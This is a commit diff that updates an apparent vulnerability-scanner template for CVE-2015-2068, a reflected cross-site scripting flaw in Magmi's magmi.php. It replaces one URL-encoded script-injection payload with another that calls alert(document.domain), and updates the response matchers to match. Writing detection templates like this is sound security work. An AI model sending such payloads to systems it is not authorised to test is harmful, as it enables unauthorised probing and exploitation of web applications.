Update CVE-2015-2068.yaml
parent
13fe132913
commit
dace44b3af
|
@ -13,13 +13,14 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert('XSS');</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
|
Loading…
Reference in New Issue